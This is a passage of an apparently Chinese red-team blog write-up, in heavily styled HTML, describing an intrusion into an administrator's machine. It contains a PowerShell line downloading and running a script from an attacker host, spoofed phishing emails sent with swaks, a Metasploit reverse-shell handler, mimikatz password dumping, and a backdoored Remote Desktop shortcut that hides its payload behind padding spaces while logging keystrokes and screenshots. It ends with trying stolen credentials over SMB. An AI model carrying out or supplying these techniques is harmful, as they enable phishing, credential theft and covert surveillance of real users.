margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: teal !important;">DownloadString</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">(</span><span class="crayon-s" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(221, 17, 68) !important;">"http://10.101.101.16/uacchm.ps1"</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">;</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">)</span></div></div></td></tr></tbody></table></div></div><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">base64&nbsp;编码之后放入&nbsp;PARAM&nbsp;的&nbsp;value&nbsp;中&nbsp;：</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"><img src="https://ws1.sinaimg.cn/large/c334041bgy1fj7h381u2eg21gy0pm7wh.gif" alt="" style="box-sizing: border-box; margin: 0px auto; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: middle; background: transparent; display: block; max-width: 100%; height: auto;"/></p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">两个恶意的文件都制作好后用&nbsp;swaks&nbsp;伪造邮件把这两个文档发送出去：</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"><img src="https://ws1.sinaimg.cn/large/c334041bgy1fj7h3ulnapj21hb0rwkjl.jpg" alt="" style="box-sizing: border-box; margin: 0px auto; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: middle; background: transparent; display: block; max-width: 100%; height: auto;"/></p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">现在静静等待管理员点击我们的恶意文件，启动msf的&nbsp;<code style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: baseline; background: transparent;">exploit/multi/handler</code>&nbsp;模块时候用&nbsp;<code style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: baseline; background: transparent;">exploit&nbsp;-j</code>&nbsp;就可以让&nbsp;msf&nbsp;在后台等待管理员上钩了。</p><h4 style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: bold; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"><br/>0x02&nbsp;后渗透</h4><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">当我们发现一个管理员中了我们的木马：</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"><img src="https://ws1.sinaimg.cn/large/c334041bgy1fj7h5prxljj20k109ggtv.jpg" alt="" style="box-sizing: border-box; margin: 0px auto; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: middle; background: transparent; display: block; max-width: 100%; height: auto;"/></p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">由于&nbsp;bypass&nbsp;了&nbsp;uac&nbsp;，所以返回的是管理员的&nbsp;shell&nbsp;，我们可以用&nbsp;mimikatz&nbsp;来把密码脱出来看看：</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"><img src="https://ws1.sinaimg.cn/large/c334041bgy1fj7h876nmij20k60ajqbk.jpg" alt="" style="box-sizing: border-box; margin: 0px auto; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: middle; background: transparent; display: block; max-width: 100%; height: auto;"/></p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">由于管理员的机子不属于任何域，也不是域账号登陆，所以我需要获取他的在远程登陆其他机子的时候的用户名和密码，根据<a href="http://www.freebuf.com/articles/system/132075.html" class="external" target="_blank" style="box-sizing: border-box; margin: 0px; padding: 0px; border-width: 0px 0px 2px; border-top-style: initial; border-right-style: initial; border-bottom-style: solid; border-left-style: initial; border-top-color: initial; border-right-color: initial; border-bottom-color: rgb(234, 234, 234); border-left-color: initial; border-image: initial; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: baseline; background: transparent; transition: all 0.2s ease 0s; text-decoration: none; color: rgb(81, 173, 237);">这篇文件</a>的介绍，我希望替换远程桌面的快捷方式来监视管理员的行为，思路是：</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><li style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: baseline; background: transparent;">（1）正常启动c:\windows\system32\mstsc.exe，避免管理员怀疑</li><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><li style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: baseline; background: transparent;">（2）由于原来的exp一启动就会有个黑框框一闪而过，要用rundll32的方式来消除黑框框，让恶意代码静态启动</li><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><li style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: baseline; background: transparent;">（3）参数部分要先加260个空格字符后面接着为payload代码，这样减小管理员查看属性的时候看到payload而产生怀疑</li><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><li style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: baseline; background: transparent;">（4）参考http://wooyun.jozxing.cc/static/drops/tips-13125.html这个文章静默启动一个桌面步骤记录程序</li><li style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: baseline; background: transparent;">（5）利用PowerSploit的Get-Keystrokes.ps1的脚本来记录键盘记录</li><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><li style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: baseline; background: transparent;">（6）记录一分钟后把记录的文件隐藏起来</li><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><li style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: baseline; background: transparent;">（7）启动metasploit的反弹连接</li><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><li style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: baseline; background: transparent;">（8）修改图标（关于C:\Windows\system32\SHELL32.dll的图标id）</li><p>&nbsp;<br/></p><br/><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">使用方法：</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"><img src="https://ws1.sinaimg.cn/large/c334041bgy1fj7ha32vrzj212b0la1kx.jpg" alt="" style="box-sizing: border-box; margin: 0px auto; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: middle; background: transparent; display: block; max-width: 100%; height: auto;"/></p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">看着已经生成好了，看一下效果：<br/>&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"><img src="https://ws1.sinaimg.cn/large/c334041bgy1fj7hagam0ej20ad0dcmyp.jpg" alt="" style="box-sizing: border-box; margin: 0px auto; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: middle; background: transparent; display: block; max-width: 100%; height: auto;"/></p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">看着比较正常，用起来也很正常，没有卡顿，没有一闪而过的黑框，如果管理员用到远程登陆快捷方式去远程登陆服务器的话，在&nbsp;<code style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: baseline; background: transparent;">c:\windows\temp</code>&nbsp;目录下会生成&nbsp;log.dll&nbsp;，这个里面记录的是键盘记录，cap.zip记录的是关键步骤截屏：</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"></p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"><img src="https://ws1.sinaimg.cn/large/c334041bgy1fj7hazxkd6g21gy0q6npe.gif" alt="" style="box-sizing: border-box; margin: 0px auto; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: middle; background: transparent; display: block; max-width: 100%; height: auto;"/></p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">等管理员启动的恶意的远程登陆快捷方式之前，可以用管理员的密码在应用服务器网段内用&nbsp;<code style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: baseline; background: transparent;">use&nbsp;auxiliary/scanner/smb/smb_login</code>&nbsp;碰碰运气（看起来运气并不怎么样。。。）：</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", 